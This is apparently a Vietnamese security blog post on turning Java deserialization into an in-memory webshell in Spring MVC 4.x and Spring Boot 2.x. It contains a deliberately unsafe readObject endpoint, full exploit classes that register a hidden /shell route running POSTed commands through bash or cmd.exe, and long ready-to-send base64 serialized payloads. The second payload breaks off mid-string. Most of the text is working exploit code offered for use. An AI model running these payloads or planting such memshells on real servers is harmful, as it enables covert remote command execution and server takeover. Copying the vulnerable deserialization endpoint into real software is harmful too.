Deserialize to memshell in Spring

Ở bài này mình sẽ note về leo memshell thông qua deserialize trong Spring

1. Preface

Trước khi đi vào thì mình note một xíu về JDK version. Các phiên bản Spring Framework 5.x trở đi thì Spring yêu cầu JDK8+, từ Spring Framework 6.x trở đi sẽ yêu cầu tối thiểu là JDK17 trở lên. Do đó ta sẽ có bảng sau:

JDK8+

JDK17+

Spring Boot 2.x

Spring Boot 3.x

SpringMVC 4.x

SpringMVC 6.x

Spring MVC 5.x

2. Deser2memshell trong Spring với JDK8

A. SpringMVC 4.x

Dựng môi trường demo

Tạo một project SpringMVC như bài trước nhưng lần này mình dùng JDK8 với SpringMVC 4.x

Thêm path deser

@ResponseBody
@RequestMapping(value = "/deser", method = RequestMethod.POST)
public String deser(@RequestParam("data") String data) {
    try {
        byte[] decodedData = Base64.getDecoder().decode(data);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decodedData))) {
            ois.readObject();
        }
    } catch (IOException | ClassNotFoundException e) {
        e.printStackTrace();
    }
    return "Done";
}

Mình sẽ exploit bằng chain CC3 nên ta import thêm commons-collections-3.2.1

<dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
</dependency>

Exploit

Vì trong Spring thì ta có thể get trực tiếp ApplicationContext để triển khai memshell, không giống như trong Tomcat phải tìm cách gọi được HttpServletRequest trong quá trình Runtime. Do đó việc exploit có phần đơn giản hơn nhiều

Mình sẽ dùng code gen payload CC3 như bài trước. Tuy nhiên sẽ chỉnh sửa class exploit lại 1 chút để load memshell như sau

// Cre: https://devme4f.github.io/posts/2023/quick-note-spring-memshell/

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

public class ExploitDeser2Mem extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {}

    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {}
    public ExploitDeser2Mem() throws Exception {
        super();
        try {
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
            RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);
            Method method = ExploitDeser2Mem.class.getDeclaredMethod("shell");
            PatternsRequestCondition url = new PatternsRequestCondition("/shell");
            RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
            RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
            r.registerMapping(info, new ExploitDeser2Mem("a"), method);
        } catch (Exception e) {}
    }

    public ExploitDeser2Mem(String a) {}

    public void shell() throws IOException {
        try {
            HttpServletRequest request = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest();
            HttpServletResponse response = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getResponse();

            String arg0 = request.getParameter("cmd");
            if (arg0 != null && request.getMethod().equals("POST")) {
                ProcessBuilder p;
                String o = "";
                PrintWriter w = response.getWriter();
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/bash", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                w.write(o);
                w.flush();
                w.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {}
    }
}

Nguyên nhân ta có thêm một constructor nhận String a nữa là vì trong quá trình exploit chain CC3 thì constructor của ExploitDeser2Mem được gọi. Payload inject memshell được thực thi, mà payload triển khai memshell cũng tạo instance của ExploitDeser2Mem -> cũng gọi đến constructor. Điều này tạo ra vòng loop vô tận làm quăng lỗi overflow, do đó ta cần thêm constructor thứ 2.

Ta sẽ có payload gen ra như sau

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAFlTK/rq+AAAANADrCgA7AHgKAHkAeggAewsAfAB9BwB+BwB/CwAFAIAHAIEIAGIHAIIKAAoAgwcAhAcAhQgAhgoADACHBwCIBwCJCgAQAIoHAIsKABMAjAgAYAoACACNCgAGAI4HAI8HAJAKABkAkQoAGQCSCACTCwCUAJULAJQAlggAlwoADQCYCACZCwCaAJsIAJwKAJ0AngoADQCfCACgCgANAKEHAKIIAKMIAKQKACgAhwgApQgApgcApwoAKACoCgCpAKoKAC4AqwgArAoALgCtCgAuAK4KAC4ArwoALgCwCgCxALIKALEAswoAsQCwCwCaALQHALUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAHkxvcmcvZXhhbXBsZS9FeHBsb2l0RGVzZXIyTWVtOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwC2AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAAXIBAFRMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL2Fubm90YXRpb24vUmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZzsBAAZtZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3VybAEASExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQAEaW5mbwEAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEADVN0YWNrTWFwVGFibGUHAIEHAI8BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAFhAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFc2hlbGwBAAFwAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAFvAQABdwEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABGFyZzAHALcHALgHAIUHALkHAKIHAKcHALoBAApTb3VyY2VGaWxlAQAVRXhwbG9pdERlc2VyMk1lbS5qYXZhDABOAE8HALsMALwAvQEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRGlzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcAvgwAvwDAAQA1b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nDADBAMIBABxvcmcvZXhhbXBsZS9FeHBsb2l0RGVzZXIyTWVtAQAPamF2YS9sYW5nL0NsYXNzDADDAMQBAEZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQAQamF2YS9sYW5nL1N0cmluZwEABi9zaGVsbAwATgDFAQBMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbgEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWV0aG9kDABOAMYBAD1vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDABOAMcMAE4AXwwAyADJAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAQG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMMAMoAywwAzADNAQADY21kBwC3DADOAM8MANAA0QEABFBPU1QMANIA0wEAAAcAuAwA1ADVAQAHb3MubmFtZQcA1gwA1wDPDADYANEBAAN3aW4MANkA2gEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAB2NtZC5leGUBAAIvYwEACS9iaW4vYmFzaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIMANsA3AcA3QwA3gDfDABOAOABAAJcQQwA4QDiDADjAOQMAOUA0QwA5gBPBwC5DADnAF8MAOgATwwA6QDqAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEAOW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlcwEADGdldEF0dHJpYnV0ZQEAJyhMamF2YS9sYW5nL1N0cmluZztJKUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAOyhbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWV0aG9kOylWAQH2KExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGFyYW1zUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL0hlYWRlcnNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUHJvZHVjZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUmVxdWVzdENvbmRpdGlvbjspVgEAD3JlZ2lzdGVyTWFwcGluZwEAQShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOylWAQAKZ2V0UmVxdWVzdAEAKSgpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQALZ2V0UmVzcG9uc2UBACooKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEA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

Tiến hành inject

Kết quả

B. SpringBoot 2.x

Dựng môi trường demo

Tạo một project SpringBoot như bài trước nhưng lần này mình dùng JDK8 với SpringBoot 2.x

Mình dùng phiên bản 2.7.6, nếu dùng verion trước 2.6 thì modify payload lại xíu như mình đề cập bài trước.

Cuối cùng thêm path để deser cũng như trên

Exploit

Mình sẽ có class exploit như sau

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.servlet.support.RequestContextUtils;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

public class ExploitDeser2MemStringBoot extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {}

    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {}
    public ExploitDeser2MemStringBoot() throws Exception {
        super();
        try {
            WebApplicationContext context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest());
            RequestMappingHandlerMapping mappingHandler = context.getBean(RequestMappingHandlerMapping.class);
            Method method = ExploitDeser2MemStringBoot.class.getMethod("run");
            Method getMappingForMethod = mappingHandler.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
            getMappingForMethod.setAccessible(true);

            RequestMappingInfo mInfo = (RequestMappingInfo) getMappingForMethod.invoke(mappingHandler, method, ExploitDeser2MemStringBoot.class);
            ExploitDeser2MemStringBoot obj = new ExploitDeser2MemStringBoot();
            mappingHandler.registerMapping(mInfo, obj, method);
        } catch (Exception e) {}
    }

    public ExploitDeser2MemStringBoot(String a) {}

    @RequestMapping("/shell")
    public void run() throws IOException {
        try {
            HttpServletRequest request = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest();
            HttpServletResponse response = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getResponse();

            String arg0 = request.getParameter("cmd");
            if (arg0 != null && request.getMethod().equals("POST")) {
                ProcessBuilder p;
                String o = "";
                PrintWriter w = response.getWriter();
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/bash", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                w.write(o);
                w.flush();
                w.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {}
    }
}

Ta sẽ có payload gen ra như sau

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAFIXK/rq+AAAANADxCgA5AHkKAHoAewcAfAoAAwB9CgB+AH8HAIALAIEAggcAgwgAXwcAhAoACgCFCgARAIYIAFUHAIcKAAoAiAoADgCJBwCKCgAOAIsHAIwKAAgAeQoABgCNBwCOCgB6AI8KAAMAkAgAkQsAkgCTCwCSAJQIAJUKACYAlggAlwsAmACZCACaCgCbAJwKACYAnQgAngoAJgCfBwCgBwChCACiCACjCgAlAKQIAKUIAKYHAKcKACUAqAoAqQCqCgAsAKsIAKwKACwArQoALACuCgAsAK8KACwAsAoAsQCyCgCxALMKALEAsAsAmAC0BwC1AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9v